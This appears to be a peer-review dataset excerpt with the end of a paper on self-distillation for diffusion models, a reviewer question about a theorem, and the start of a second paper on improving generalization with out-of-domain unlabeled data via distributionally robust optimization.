that of progressive distillation, where the total steps are progressively halved during the distillation process. We first set the total number of parameter updates $P$. We then have $N_{i+1} = N_i/2$ and $U_i = \frac{P}{|N|} \frac{1}{N_i}$, with $|N|$ being the total number of different step-size depths $N_i$ we use. Additionally, we introduce teacher-student distillation (TSD) with identical scheduling to DSDI, which similarly forgoes the sampling from an existing data-set, yet differs from DSD in that we instead mimic PD and introduce a separate teacher model to produce the distillation targets. Gradual DSD (DSDGL) In gradual DSD, we decay the number of learning steps by two steps per iteration, so that $N_{i+1} = N_i - 2$. The formula for $U_i$ is the same as before. 4.2 Training DSD If self-distillation works for finetuning an already-trained model, it is reasonable to ask whether we might also apply it during the original training phase of the model. In this setting, we are training from data, and we are not necessarily sampling from the model, so we adapt our method to minimize the amount of overhead that the inclusion of self-distillation requires. Given that direct self-distillation does not require any pre-trained teacher model, it becomes possible for a diffusion model to distill into itself during the training phase. During such a process the distillation loss, calculated as the error between two successive DDIM steps as depicted in [1], can either be used to update the diffusion model’s parameters, or alternatively incorporated in combination with the train loss during each step. The training loss is the squared difference between the predicted $\hat{v}_t$ and the true $v_t$, following the v-prediction algorithm as described in [Ho et al.]. The total loss is then supplemented by the distillation loss between the predicted $x'$ and the predicted $x''$, similar to that of Algorithm 2. \[ L = \alpha \cdot [\hat{v}_t - v_t]^2 + \beta \cdot [x' - x'']^2 \] where \( \alpha \) and \( \beta \) are hyper-parameters used to balance the main loss and the distillation loss respectively. Due to \( z_t \) being a component in both the calculation of \( v_t \) and \( x' \), this only needs to be calculated once with a single computation graph. 5 RESULTS Evaluation and training details To compare these different methods, we use the Fréchet Inception Distance (FID) and Inception Score (IS) to evaluate image sampling performance at various DDIM steps. For unconditional image generation, we use the models from Rombach et al. (2022) pre-trained on the CelebA-HQ 256\(^2\) dataset (Karras et al., 2018) and LSUN Bedroom (Yu et al., 2015), as well as the conditional model from the same source trained on the ImageNet-256\(^2\) dataset (Deng et al., 2009). We compare three scheduling approaches for DSD to values reported in the relevant PD literature, in addition to TSD. During the distillation process, we set the guidance scale to be randomly sampled from \( w = [1.0, 3.0] \) and all distillation attempts for the conditional and unconditional models receive 4000 and 5000 total parameter updates (\( P \)), respectively. The hyperparameters used for both the conditional- and unconditional models are shown in Table 5 in the appendix. In previous research on the distillation of conditional diffusion models by Meng et al. (2023), Progressive Distillation required re-training of the original model to predict \( x_0 \) without the use of a separate guidance forward pass, as running both passes caused divergence during the distillation process. Our approach does not involve this procedure, as our goal is not to distill down to as few sampling steps as possible, but rather to compare DSD to Progressive Distillation while reducing the required model updates for similar image quality. The learning rates for all three models were kept identical between different distillation procedures to ensure a fair comparison between the DSD/TSD implementations and PD. More specifically, we optimized the learning for TSD and then applied these values to DSD without further optimization, to achieve a conservative estimate of the relative benefit of DSD over PD, given that TSD more closely resembles PD. The implementation of progressive distillation by Ho et al. saw the learning rate reduced to 0 during each halving of total DDIM steps. Given our lower number of total parameter updates, we decided to implement a cosine annealing schedule for the learning rate, gradually decreasing to 10% of the original learning rate over the duration of each distillation procedure. This was found to improve the distillation stability of TSD, and therefore by extension DSDI, which both see fewer DDIM steps as the distillation progresses. This annealing schedule was then applied to all DSD methods. 5.1 Fine-tuning DSD Table 1 shows the FID scores for the original unconditional CelebA-HQ and LSUN Bedroom models, as well as the FID/IS scores for the conditional ImageNet-256 model. Unconditional models Distillation results in terms of FID scores of the unconditional CelebA-HQ and LSUN Bedroom models are shown in Table 2, with the undistilled models’ performances detailed in Table 1. A visual comparison between the different DDIM steps for CelebA-HQ is given in Appendix 2. Given the absence of image classes for either dataset, only FID scores were used to compare image fidelity between different distillation types and the number of DDIM steps. For CelebA-HQ, for which at the time of writing no PD counterpart was found, both 2- and 4 step DSDI show a minor lead over other self-distillation types, with DSDN demonstrating a slight improvement at 8 steps. TSD shows what performance may be expected when performing indirect self-distillation. 7 The original pretrained LSUN Bedroom model was configured to produce latent images at 64x64, before being upsampled within the pixel-space to 256x256, similar to the other models. We altered the configuration to match the output of 128x128 for comparison against results obtained from the Progressive Distillation implementation by Salimans & Ho. | Model | Conditional DDIM - FID(↓)/IS(↑) | |------------------------|---------------------------------| | | PD | TSD (ours) | DSDI (ours) | DSDDN (ours) | DSDGL (ours) | | ImageNet-256 2-step (5K)| **14.55** / **120.00** (52R*) | 129.54 / 4.60 | 119.98 / 5.20 | 100.26 / 7.98 | 132.03 / 4.38 | | ImageNet-256 4-step (5K)| 13.19 / 126.36 (32R*) | 20.21 / 61.33 | 15.15 / 87.85 | **10.27** / **126.61** | 20.01 / 82.70 | | ImageNet-256 8-step (5K)| 12.72 / 128.63 (12R*) | **9.51** / **180.49** | 9.78 / 184.24 | 13.69 / **198.43** | 14.46 / 140.68 | | Model | Unconditional DDIM - FID(↓) | |------------------------|-----------------------------| | CelebA-HQ 2-step (4K) | - | **151.01** | **136.45** | 137.38 | 145.61 | | CelebA-HQ 4-step (4K) | - | 69.12 | **41.46** | 45.78 | 52.40 | | CelebA-HQ 8-step (4K) | - | 28.92 | 19.51 | **19.28** | 24.25 | | Lsun Bedroom 2-step (4K)| **6.70** (400K**) | 183.76 | 141.89 | **104.48** | 142.24 | | Lsun Bedroom 4-step (4K)| 3.53 (450K**) | 78.69 | 43.56 | **30.50** | 38.91 | | Lsun Bedroom 8-step (4K)| 2.31 (550K**) | 23.59 | 17.87 | **11.20** | 28.01 | Table 1: FID scores for the pre-trained CelebA-HQ and LSUN Bedroom models and FID/IS scores for the Conditional ImageNet-256 model, prior to distillation, at 2, 4, 8, 16, 32, and 64 DDIM steps, calculated over 5K sample images per combination of model and sampling-steps (S). Table 2: FID scores at 2, 4 and 8 DDIM steps for the distilled unconditional CelebA-HQ and LSUN Bedroom pretrained models (calculated after 4 000 parameter updates) and FID/IS scores for the distilled Conditional pretrained ImageNet-256 model (calculated after 5 000 parameter updates). The Inception Scores were calculated using 5 000 generated samples for each combination of the model, step size, and distillation procedure, using 30 000 samples for the FID calculation. PD shows baseline results of previous Progressive Distillation techniques, with * indicating results and number of model parameter updates from figures in [Meng et al.] compared against 5 000 samples. ** Indicates results and the amount of model parameter updates similarly obtained from figures in [Salimans & Ho]. Interestingly, for the LSUN Bedroom model, DSDDN outperforms other direct self-distillation methods by quite a large margin, although the very low number of sampling steps do not show image fidelity quite like that of the Progressive Distillation baseline gathered from [Salimans & Ho]. Regardless, a great improvement to image quality is gained at these steps with just 4 000 parameter updates, which requires far fewer steps than PD at around 400 to 500 thousand updates. It should however be noted that our implementation of distillation, particularly self-distillation, may be introducing variance to the pixel-distributions of the model’s generated images. This is due to the sampling of distillation targets from the model’s own output, compared to existing methods which sample real images before adding Gaussian noise. Inception Scores are therefore more representative of image quality and diversity, although unavailable when sampled without conditional classes. Conditional models For the distilled class-conditional ImageNet-256 models, Table 2 shows the results of the distilled models in terms of FID and IS scores. Regarding IS, DSDDN outperforms all other DSD methods, suggesting that DSDDN is able to improve distinct image features faster. In Figure 2 we see a comparison given the same initial noisy latent $z_0$, which shows how DSDDN seems to outperform the other distilled models after both 4 and 8 steps in subjective image quality as well. At 4 steps the outline of the four classes appears to have more detail and clarity, plus improved contrast and colour saturation. At 8 steps, some novel image structures are introduced, where for example the caudal fin (vertical tail fin) of the great white shark sample is defined only in the DSDDN model, even improving upon the image coherence of the respective original 64-step model’s image. Such examples of DSDDN seemingly surpassing the original full-step model were common during sample generation. Compared to the existing Progressive Distillation method for conditional models by Meng et al., we are outperformed at very low DDIM steps. At this stage they performed between 12-52 thousand parameter updates, while our results were obtained after just 5,000. Still, especially DSDN, sees improved image quality at 4 and 8 DDIM steps despite the relatively short training period. Interestingly, both the FID and IS scores as detailed by Meng et al. don’t improve much as the number of steps increase. We note the large difference between the minimum FID scores obtained by the baseline PD papers compared to our methods. It is possible that our decision to perform distillation up to a maximum of 64 DDIM steps may have contributed to increased deviation from the data-sets’ pixel distributions. This could be explained by the decrease of the relative signal-to-noise ratio during the distillation process compared to distilling from 256- (Meng et al., 2023) or 1024 (Salimans & Ho, 2022) DDIM steps. ![Figure 2: (left) Random a), 4- and 8-step samples from the distilled unconditional CelebA-HQ 256x256 model and b) the distilled conditional ImageNet-256² model, including 64-step samples from the undistilled models. (right) Random 128-step samples from trained and trained-distilled models for c) LSUN Bedroom, d) CelebA, and e) LSUN Church Outdoor datasets.] 5.2 Training DSD We apply training DSD on three separate datasets, the 64x64 pixel versions of the CelebA, LSUN Bedroom and LSUN Church Outdoor datasets. The loss function $L$ is defined as a weighted sum of the training loss and the distillation loss. All three models were trained with $\nu$-prediction as their output, similar to that described in Salimans & Ho (2022). For celebA, a total of 65,000 parameter updates were performed at a learning rate of $10^{-4}$, whereas the LSUN Bedrooms model was trained for 50,000 parameter updates at a learning rate of $4 \cdot 10^{-4}$ with the LSUN Church Outdoor model being trained at the same learning rate for just 40,000 parameter updates. For distillation during training, $\alpha$ and $\beta$ were set to $[0.85, 0.15]$, respectively. Setting $\beta$ to a similarly low value inhibits the affect of the distillation loss when the model has not matured yet during the early stages of training. During this phase, consecutive DDIM steps still show little variation, lowering the importance of distillation at this time. In the later stages when training loss stabilizes and successive DDIM steps add improvements to image fidelity, distillation loss becomes more important as the training loss stabilizes. Further research could attempt a dynamic weight scheduling between these two parameters to optimize distillation during training. Post-training samples for all three models are shown in Figure 2 with the corresponding FID scores depicted in Table 3. For the LSUN Bedroom model, subtle improvements to features in the images can be seen when distillation is performed, with the final FID score improving mostly towards the end of the training process, during which the distillation loss affects the model’s weight updates the most and we see that training without distillation start to plateau. However, such improvements were not clearly seen for the CelebA dataset, where despite subjective improvements between the samples with and without distillation, no clear improvements to FID is found. Interestingly, FID scores show a nearly identical trend throughout the training process. The early stabilisation of the FID scores around just 20 to 25 thousand steps may be indicating that the train loss decreased more rapidly. than was the case for the LSUN Bedrooms dataset, where the distillation loss had relatively little impact later on during training. For the LSUN Church Outdoor dataset, a more gradual decline in FID is seen, with the distilled model finally overtaking during the later training phase. Similar to the results of the LSUN Bedroom model, distinct image features seem to be present in the distilled model before yet visible in the non-distilled counterpart. Figure 3: FID scores for the trained and train-distilled models on the a) LSUN Bedroom, b) CelebA, and c) LSUN Church Outdoor datasets. 6 CONCLUSION Our results demonstrate the applicability of self-distillation to diffusion settings. Both for fine-tuning a pre-trained model, and for training a diffusion model from scratch. We have also tested different schedules for reducing the sampling steps during (self-) distillation. We find that on the datasets tested, a linear reduction may perform better than the halving schedule used in progressive distillation, but the specifics appear highly dependent on the task. In some cases, a naive approach without any scheduling (DSDN) performs best. This could be explained by the relative increase in parameter updates during lower depths compared to other DSD approaches, similar to the Progressive Distillation techniques where the total number of denoising steps performed is lowered after each distillation step. By forgoing the use of a separate teacher model, DSD reduces the network evaluations required per update of the parameters from 3 (Ho & Salimans) down to just 2. This also implies that, unless the teacher outputs have previously been cached, DSD frees up the GPU memory taken up by a teacher model, reducing the hardware requirements of diffusion model distillation. DSD also demonstrates improved convergence during distillation, requiring fewer total parameter updates for reaching a similar or improved level of image quality. Limitations and future work One important limitation of DSD is the requirement to train sequentially, in concert with the denoising process. This means that the samples that we train on are not fully i.i.d., but in practice this does not appear to seriously impact learning. The benefit is that no dataset is required during fine-tuning, simplifying the training process. Our results on training DSD suggest that self-distillation may be employed favorably in training models from scratch. However, how this approach behaves at scale, and whether it leads directly to models that generate high-quality images in 1-10 samples, without a two-step training process remains to be seen. Additionally, studying the combination of DSD with existing non-direct distillation approaches might demonstrate DSD’s strengths in quickly decreasing the required number of sampling steps before distilling down to 1-2 sampling steps using existing methods. Answering this question experimentally likely requires substantial experimental resources. We leave this question to future work. 7 REPRODUCIBILITY STATEMENT Our code is publicly available at https://anonymous.4open.science/r/DSD. The hyperparameters used for the DSD implementations are provided in Table 3 in the Appendix. The full specifications for the models used in training DSD are available as configuration files in the repository. The processes for calculating the FID and Inception Score metrics for all models are likewise made available. All distilled model checkpoints, including all generated samples for each implementation and number of DDIM steps, will be made available on the public repository. REFERENCES Cristian Buciluţă, Rich Caruana, and Alexandru Niculescu-Mizil. Model compression. In Proceedings of the 12th ACM SIGKDD international conference on Knowledge discovery and data mining, pp. 535–541, 2006. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255, Jun 2009. doi: 10.1109/CVPR.2009.5206848. Jianping Gou, Baosheng Yu, Stephen J Maybank, and Dacheng Tao. Knowledge distillation: A survey. International Journal of Computer Vision, 129:1789–1819, 2021. Geoffrey E. Hinton, Oriol Vinyals, and Jeffrey Dean. Distilling the knowledge in a neural network. CoRR, abs/1503.02531, 2015. URL http://arxiv.org/abs/1503.02531 Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. doi: 10.48550/ARXIV.2207.12598. URL https://arxiv.org/abs/2207.12598. A short version of this paper appeared in the NeurIPS 2021 Workshop on Deep Generative Models and Downstream Applications: https://openreview.net/pdf?id=qw8AKxfYbI. Jonathan Ho, William Chan, Chitwan Saharia, Jay Whang, Ruiqi Gao, Alexey Gritsenko, Diederik P. Kingma, Ben Poole, Mohammad Norouzi, David J. Fleet, and Tim Salimans. Imagen Video: High Definition Video Generation with Diffusion Models. doi: 10/grr3bd. URL https://arxiv.org/abs/2210.02303 Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. In Hugo Larochelle, Marc’Aurelio Ranzato, Raia Hadsell, Maria-Florina Balcan, and Hsuan-Tien Lin (eds.), Advances in Neural Information Processing Systems 33: Annual Conference on Neural Information Processing Systems 2020, NeurIPS 2020, December 6-12, 2020, virtual, 2020. URL https://proceedings.neurips.cc/paper/2020/hash/4c5bcfec8584af0d967f1ab10179ca4b-Abstract.html Jiaxin Huang, Shixiang Shane Gu, Le Hou, Yuexin Wu, Xuezhi Wang, Hongkun Yu, and Jiawei Han. Large language models can self-improve. CoRR, abs/2210.11610, 2022. doi: 10.48550/arXiv.2210.11610. URL https://doi.org/10.48550/arXiv.2210.11610 Tero Karras, Timo Aila, Samuli Laine, and Jaakko Lehtinen. Progressive growing of gans for improved quality, stability, and variation. In 6th International Conference on Learning Representations, ICLR 2018, Vancouver, BC, Canada, April 30 - May 3, 2018, Conference Track Proceedings. OpenReview.net, 2018. URL https://openreview.net/forum?id=Hk99zCeAb Guohao Li, Matthias Müller, Bernard Ghanem, and Vladlen Koltun. Training graph neural networks with 1000 layers. In International conference on machine learning, pp. 6437–6449. PMLR, 2021. Eric Luhman and Troy Luhman. Knowledge distillation in iterative generative models for improved sampling speed. CoRR, abs/2101.02388, 2021. URL https://arxiv.org/abs/2101.02388 Troy Luhman and Eric Luhman. Improving Diffusion Model Efficiency Through Patching. doi: 10.48550/ARXIV.2207.04316. URL https://arxiv.org/abs/2207.04316 [TLDR] It is shown that adding a simple ViT-style patching transformation can considerably reduce a diffusion model’s sampling time and memory usage.
Bo6GpQ3B9a
When n=0, no out-of-domain samples are utilized and the problem reduces to simple ERM. But in Theorem 4.2, when n=0, the dependence of the error on dimension is d^{3/8}, meaning that this reduction in the exponent of the dimension is not related to the utilization of out-of-domain samples.
OUT-OF-DOMAIN UNLABELED DATA IMPROVES GENERALIZATION Amir Hossein Saberi †∗ Amir Najafi † Alireza Heidari † Mohammad Hosein Movasaghinia † Seyed Abolfazl Motahari † Babak H. Khalaj‡§∗ ∗ Department of Electrical Engineering, † Department of Computer Engineering, ‡ Sharif Center for Information Systems and Data Science. § Sharif Institute for Convergence Science & Technology, Sharif University of Technology, Tehran, Iran ABSTRACT We propose a novel framework for incorporating unlabeled data into semi-supervised classification problems, where scenarios involving the minimization of either i) adversarially robust or ii) non-robust loss functions have been considered. Notably, we allow the unlabeled samples to deviate slightly (in total variation sense) from the in-domain distribution. The core idea behind our framework is to combine Distributionally Robust Optimization (DRO) with self-supervised training. As a result, we also leverage efficient polynomial-time algorithms for the training stage. From a theoretical standpoint, we apply our framework on the classification problem of a mixture of two Gaussians in $\mathbb{R}^d$, where in addition to the $m$ independent and labeled samples from the true distribution, a set of $n$ (usually with $n \gg m$) out of domain and unlabeled samples are given as well. Using only the labeled data, it is known that the generalization error can be bounded by $\propto (d/m)^{1/2}$. However, using our method on both isotropic and non-isotropic Gaussian mixture models, one can derive a new set of analytically explicit and non-asymptotic bounds which show substantial improvement on the generalization error compared to ERM. Our results underscore two significant insights: 1) out-of-domain samples, even when unlabeled, can be harnessed to narrow the generalization gap, provided that the true data distribution adheres to a form of the “cluster assumption”, and 2) the semi-supervised learning paradigm can be regarded as a special case of our framework when there are no distributional shifts. We validate our claims through experiments conducted on a variety of synthetic and real-world datasets. 1 INTRODUCTION Semi-supervised learning has long been a focal point in the machine learning literature, primarily due to the cost-effectiveness of utilizing unlabeled data compared to labeled counterparts. However, unlabeled data in various domains, such as medicine, genetics, imaging, and audio processing, often originates from diverse sources and technologies, leading to distributional differences between labeled and unlabeled samples. Concurrently, the development of robust classifiers against adversarial attacks has emerged as a vibrant research area, driven by the rise of large-scale neural networks [Goodfellow et al., 2014] [Biggio & Roli, 2018]. While the primary objective of these methods is to reduce model sensitivity to minor adversarial perturbations, recent observations suggest that enhancing adversarial robustness may also improve the utilization of unlabeled samples [Najafi et al., 2019] [Miyato et al., 2018]. This paper aims to demonstrate the efficacy of incorporating out-of-domain unlabeled samples to decrease the reliance on labeled in-domain data. To achieve this, we propose a novel framework inspired by a fusion of concepts from adversarial robustness and self-training. Specifically, we introduce a unique constraint to the conventional Empirical Risk Minimization (ERM) procedure, focusing exclusively on the unlabeled part of the dataset. Our theoretical and experimental analyses ∗Corresponding author: [email protected]. show that the inclusion of unlabeled data reduces the generalization gap for both robust and non-robust loss functions. Importantly, our alternative optimization criteria are computationally efficient and can be solved in polynomial time. We have implemented and validated the effectiveness of our method on various synthetic and real-world datasets. From a theoretical standpoint, akin to prior research (Schmidt et al., 2018; Carmon et al., 2019; Zhai et al., 2019; Alayrac et al., 2019), we also address the binary classification problem involving two Gaussian models in $\mathbb{R}^d$. This problem has been the center of attention in several recent works on theoretical analysis of both semi-supervised and/or adversarially robust learning paradigms. Despite several recent theoretical investigations, the precise trade-off between the sizes of labeled ($m$) and unlabeled ($n$) data, even in this specific case, remains incomplete. A number of works have bounded the labeled sample complexity under the assumption of an asymptotically large $n$ (Kumar et al., 2020), while another series of papers have analyzed this task from a completely unsupervised viewpoint. We endeavor to fill this gap by providing the first empirical trade-off between $m$ and $n$, even when unlabeled data originates from a slightly perturbed distribution. We derive explicit bounds for both robust and non-robust losses of linear classifiers in this scenario. Our results show that as long as $n \geq \Omega\left(\frac{m^2}{d}\right)$, our proposed algorithm surpasses traditional techniques that solely rely on labeled data. We also consider the more general case of non-isotropic Gaussian models, as explored in previous studies. The remainder of this paper is structured as follows: Section 1.1 provides an overview of related works in distributionally robust optimization and semi-supervised learning. Section 1.3 introduces our notation and definitions. In Section 1.2, we discuss the contributions made by our work. In Section 3, we present our novel method, followed by a theoretical analysis in Section 4. Section 5 showcases our experimental validations, further supporting our theoretical findings. Finally, we draw conclusions in Section 6. 1.1 PRIOR WORKS One of the challenges in adversarially robust learning is the substantial difficulty in increasing the robust accuracy compared to achieving high accuracy in non-robust scenarios (Carlini & Wagner, 2017). A study by Schmidt et al. (2018) posited that this challenge arises from the larger sample complexity associated with learning robust classifiers in general. Specifically, they presented a simple model where a good classifier with high standard (non-robust) accuracy can be achieved using only a single sample, while a significantly larger training set is needed to attain a classifier with high robust accuracy. Recent works (Carmon et al., 2019; Zhai et al., 2019; Alayrac et al., 2019) demonstrated that the gap in sample complexity between robust and standard learning, as outlined by Schmidt et al. (2018) in the context of a two-component Gaussian mixture model, can be bridged with the inclusion of unlabeled samples. Essentially, unlabeled samples can be harnessed to mitigate classification errors even when test samples are perturbed by an adversary. Another study by Najafi et al. (2019) achieved a similar result using a different definition of adversarial robustness and a more comprehensive data generation model. Their approach involves the use of ‘self-training’ to assign soft/hard labels to unlabeled data, contrasting our approach, where unlabeled data is exclusively utilized to constrain the set of classifiers, aiming to avoid crowded regions. While DRO serves as a tool in our approach, it is not necessarily the primary objective. In Deng et al. (2021), authors showed that in the setting of Schmidt et al. (2018), out-of-domain unlabeled samples improve adversarial robustness. Theoretical analysis of Semi-Supervised Learning (SSL) under the so-called cluster assumption has been a long-studied task (Rigollet, 2007). However, beyond Najafi et al. (2019), several recent methods leveraging DRO for semi-supervised learning have emerged (Blanchet & Kang, 2020; Frogner et al., 2021). Notably, Frogner et al. (2021) shares similarities with Najafi et al. (2019); however, instead of assigning artificial labels to unlabeled samples, Frogner et al. (2021) employs them to delimit the ambiguity set and enhance understanding of the marginals. Our work primarily focuses on the robustness aspect of the problem rather than advancing the general SSL paradigm. Defense mechanisms against adversarial attacks usually consider two types of adversaries: i) point-wise attacks similar to Miyato et al. (2018); Nguyen et al. (2015); Szegedy et al. (2013), and ii) distributional attacks (Staib & Jegelka, 2017; Shafieezadeh Abadeh et al., 2015; Mohajerin Esfahani & Kuhn, 2018), where in the case of the latter adversary can change the distribution of data up to a predefined budget. It has been shown that Distributionally Robust Learning (DRL) achieves a superior robustness compared to point-wise methods (Staib & Jegelka, 2017), Namkoong & Duchi (2017) utilized DRL in order to achieve a balance between the bias and variance of classifier’s error, leading to faster rates of convergence compared to empirical risk minimization even in the non-robust case. In DRL, the learner typically aims to minimize the loss while allowing the data distribution to vary within an uncertainty neighborhood. The central idea used by Namkoong & Duchi (2017) was to regulate the diameter of this uncertainty neighborhood based on the number of samples. Gao (2022) achieved similar results in DRL while utilizing the Wasserstein metric to define the perturbation budget for data distribution. Based on the above arguments, we have also utilized DRL as the main tool in developing our proposed framework. 1.2 Main Contributions We introduce a novel integration of DRO and Semi-Supervised Learning (SSL), leveraging out-of-domain unlabeled samples to enhance the generalization bound of learning problem. Specifically, we theoretically analyze our method in the setting where samples are generated from a Gaussian mixture model with two components, which is a common assumption in several theoretical analyses in this field. For example, a simpler format, when two Gaussians are isotropic and well-separated, is the sole focus of many papers such as Schmidt et al. (2018), Carmon et al. (2019), Alayrac et al. (2019). Some of our notable contributions and improvements over recent works in the field include: (i) In Theorem 4.1, we present a non-asymptotic bound for adversarially robust learning, leveraging both labeled and unlabeled samples jointly. This result builds upon the work of Carmon et al. (2019) and Alayrac et al. (2019), which focused on the effectiveness of unlabeled samples when a single labeled sample is sufficient for linear classification of a non-robust classifier. However, these studies do not provide insights into the necessary number of unlabeled samples when multiple labeled samples are involved, particularly in scenarios where the underlying distribution exhibits limited separation between the two classes. Our theoretical bounds address and fill this crucial gap. (ii) Theorem 4.2 introduces a novel non-asymptotic bound for integrating labeled and unlabeled samples in SSL. To underscore the significance of our findings, consider the following example: In the realizable setting, where positive and negative samples can be completely separated by a hyperplane in $\mathbb{R}^d$, the sample complexity of supervised learning for a linear binary classifier is known to be $O(d/\epsilon)$ (Mohri et al., 2018). However, in the non-realizable setting, this complexity escalates to $O(d/\epsilon^2)$ (Mohri et al., 2018). A pivotal question in learning theory revolves around how to approach the sample complexity of $O(d/\epsilon)$ in the non-realizable setting. Insights provided by Namkoong & Duchi (2017) delve into this inquiry. Notably, even with the awareness that the underlying distribution is a Gaussian mixture, the optimal sample complexity, as per Ashtiani et al. (2018), still exceeds $O(d/\epsilon^2)$. Our work demonstrates that in scenarios where the underlying distribution is a Gaussian mixture and we possess $m = O(d/\epsilon)$ labeled samples, coupled with $n = O(d/\epsilon^2)$ unlabeled samples (without knowledge of the underlying distribution), one can achieve an error rate lower than or equal to the case of having access to $O(d/\epsilon^2)$ labeled samples. (iii) We formalize the incorporation of out-of-domain unlabeled samples into the generalization bounds of both robust and non-robust classifiers in Theorems 4.1, 4.2, and 4.4. We contend that this represents a novel contribution to the field, with its closest counterpart being Deng et al. (2021). Notably, Deng et al. (2021) addresses a scenario where the underlying distribution is a isotropic Gaussian mixture with well-separated Gaussian components, while the separation of components is not a prerequisite for our results. 1.3 Notation and Definitions Let us denote the feature space by $\mathcal{X} \subseteq \mathbb{R}^d$, and assume $\mathcal{H}$ as a class of binary classifiers parameterized by the parameter set $\Theta$: for each $\theta \in \Theta$, we have a classifier $h_\theta \in \mathcal{H}$ where $h_\theta : \mathcal{X} \rightarrow \{-1, 1\}$. Assume a positive function $\ell : (\mathcal{X} \times \{-1, 1\} \times \Theta) \rightarrow \mathbb{R}_{\geq 0}$ as the loss function. Also, let $P$ be the unknown data distribution over $\mathcal{X} \times \{-1, 1\}$, and $S = \{(X_i, y_i)\}_{i=1}^m$ for $m \in \mathbb{N}$ be a set of i.i.d. samples drawn from $P$. Then, for all $\theta \in \Theta$ the true risk $R$ and the empirical risk $\hat{R}$ of a classifier w.r.t. $P$ can be defined as follows: $$R(\theta, P) = \mathbb{E}_P [\ell(X, y; \theta)], \quad R(\theta, \hat{P}_S^m) = \mathbb{E}_{\hat{P}_S^m} [\ell(X, y; \theta)] \triangleq \frac{1}{m} \sum_{i=1}^m \ell(X_i, y_i; \theta), \quad (1)$$ where \( \hat{P}_S^m \) denotes an empirical estimate of \( P \) based on the \( m \) samples in \( S \). We also need a way to measure the distance between various distributions that are supported over \( X \). A well-known candidate for this goal is the Wasserstein distance (Definition A.1). Subsequently, we also define a Wasserstein ball in Definition A.2 in order to effectively constrain a set of probability measures. It should be noted that throughout this paper, the Wasserstein distance between any two distributions supported over \( X \times \{\pm 1\} \) is defined as the distance between their respective marginals on \( X \). The ultimate goal of classical learning is to find the parameter \( \theta^* \in \Theta \) such that with high probability, \( R(\theta^*) \) is sufficiently close to \( \min_\theta R(\theta) \). A well-known approach to achieve this goal is Empirical Risk Minimization (ERM) algorithm, formally defined as follows: \[ \hat{\theta}_{\text{ERM}}(S) \triangleq \arg\min_{\theta \in \Theta} \mathbb{E}_{\hat{P}_S^m}[\ell(\theta; X, y)] = \arg\min_{\theta \in \Theta} \frac{1}{m} \sum_{i=1}^{m} \ell(\theta; X_i, y_i). \] A recent variant of ERM, which has gained huge popularity in both theory and practice, is the so-called Distributionally Robust Learning (DRL) which is formulated as follows: **Definition 1.1 (Distributionally Robust Learning (DRL)).** DRL aims at training a classifier which is robust against adversarial attacks on data distribution. In this regard, the learner attempts to find a classifier with a small robust risk, denoted as \( R_{\text{robust}}(\theta, P) \), which is defined as \[ R_{\epsilon,c}^{\text{robust}}(\theta, P) = \sup_{P' \in B_\epsilon(P)} R(\theta, P'), \] for all \( \theta \in \Theta \) and any \( \epsilon \geq 0 \). Therefore, DRL solves the following optimization problem: \[ \hat{\theta}_{\text{DRL}}^{\epsilon,c}(S) \triangleq \arg\min_{\theta \in \Theta} R_{\epsilon,c}^{\text{robust}}(\theta, \hat{P}_S^m). \] Surprisingly, the sophisticated minimax optimization problem of equation [4] which takes place in a subset of the infinite-dimensional space of probability measures that corresponds to the constraints, can be substantially simplified when is re-written in the dual format: **Lemma 1.2 (From Blanchet et al., 2019).** For a sufficiently small \( \epsilon > 0 \), the minimax optimization problem of equation [4] has the following dual form: \[ \inf_{\theta \in \Theta} \sup_{P' \in B_\epsilon(\hat{P}_S^m)} R(\theta, P') = \inf_{\gamma \geq 0} \left\{ \gamma \epsilon + \inf_{\theta \in \Theta} \frac{1}{m} \sum_{i=1}^{m} \sup_{Z \in X} \ell(Z, y_i; \theta) - \gamma c(Z, X_i) \right\}, \] where \( \gamma \) and \( \epsilon \) are dual parameters, and there is a bijective and reciprocal relation between the \( \epsilon \) and \( \gamma^* \), i.e., the optimal value which minimizes the r.h.s. As suggested by Sinha et al. (2017), the \( \inf_{\gamma \geq 0} \) in the r.h.s. part in the above optimization problem can be removed by fixing a user-defined value for \( \gamma \). This also means that if one attempts to find the optimal value for \( \theta \), the additive term \( \gamma \epsilon \) is ineffective and can be removed as well. It should be noted that this also fixes an (unknown) value for \( \epsilon \). In practice, the appropriate value for \( \epsilon \) is not known beforehand and thus can be usually found through a cross-validation stage, while the same procedure can be applied to its dual counterpart, i.e., \( \gamma \). In other words, the above-mentioned strategy keeps the generality of the problem intact. For the sake of simplicity in relations, throughout the rest of the paper we work with the dual formulation in equation [5] and let \( \gamma \) be a fixed and arbitrary value. ## 2 PROBLEM DEFINITION At this point, we can formally define our problem. Let \( X \subseteq \mathbb{R}^d \), and assume \( P_0 \) be an unknown and arbitrary distribution supported on \( X \times \{\pm 1\} \), i.e., \( P_0 \) produces feature-label pairs. For a valid cost function \( c : X^2 \to \mathbb{R}_{>0} \), let \( P_1 \) represent a shifted version of \( P_0 \) such that the marginal distributions of \( P_0 \) and \( P_1 \) on \( X \) are shifted with \( W_c(P_0,X,P_1,X) = \alpha \) for some \( \alpha > 0 \). No assumption on \( P_1(y|X) \) is necessary in this work. Here, the subscript \( X \) implies the marginal distribution on \( X \). Let us consider the following two sets of samples: \[ S_0 = \{(X_i, y_i)\}_{i=1}^{m} \sim P_0^m, \quad S_1 = \{X'_i\}_{i=1}^{n} \sim P_1^n, \] where $S_0$ indicates the labeled set and $S_1$ represents the unlabeled out-of-domain data. A classical result from VC-theory states that the generalization gap in learning from only $S_0$ (with high probability) can be bounded as $$R(\hat{\theta}_{\text{ERM}}, P_0) \leq \min_{\theta \in \Theta} R(\theta, P_0) + O\left(\sqrt{\text{VCdim}(\mathcal{H})/m}\right) + \sqrt{O(1)/m},$$ (6) where $\text{VCdim}(\mathcal{H})$ denotes the VC-dimension of hypothesis class $\mathcal{H}$ (Mohri et al., 2018). This bound can be prohibitively large when $\text{VCdim}(\mathcal{H})$ grows uncontrollably, e.g., the case of linear classifiers in very high dimensions ($d \gg 1$). We aim to propose a general framework that leverages both $S_0$ and $S_1$ concurrently, and outputs (in polynomial time) an estimator, denoted by $\hat{\theta}_{\text{RSS}}$, such that the second term in the r.h.s. of equation 6 would decay faster as one increases both $m$ and $n$. We are specially interested in cases where $n \gg m$. In the next step, we apply our method on a simplified 